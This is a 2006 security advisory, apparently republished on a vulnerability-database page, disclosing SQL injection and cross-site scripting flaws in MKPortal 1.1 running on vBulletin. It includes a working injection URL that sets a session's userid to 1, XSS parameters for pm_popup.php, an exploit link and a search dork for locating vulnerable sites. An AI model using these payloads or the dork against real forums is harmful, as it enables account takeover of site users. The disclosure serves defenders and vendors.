MKPortal 1.1 Remote SQL Injection Vulnerability.

Advisory Content :

--Security Report--
Advisory: vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/04/06 22:36 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: MKPortal (http://www.mkportal.it/)
Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)
About: Via this methods remote attacker can inject arbitrary SQL queries to

ind parameter in index.php of MKPortal.
Vulnerable code can be found in the file
mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it

easy to
by pass this SQL update function.
Also there is cross-site scripting vulnerability in pm_popup.php the
parameters u1,m1,m2,m3,m4 did not sanitized properly.
Level: Critical
---
How&Example:
SQL Injection :

GET -> http://[victim]/[mkportaldir]/index.php?ind=[SQL]
EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1
So with this example remote attacker updates his session's userid to 1 and
after refreshing the page he can logs as userid 1.

XSS:
GET ->

http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2
=[XSS]&m3=[XSS]&m4=[XSS]

---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=26
---
Dorks: "MKPortal 1.1 RC1"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=26

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

MKPortal 1.1 Remote SQL Injection Vulnerability.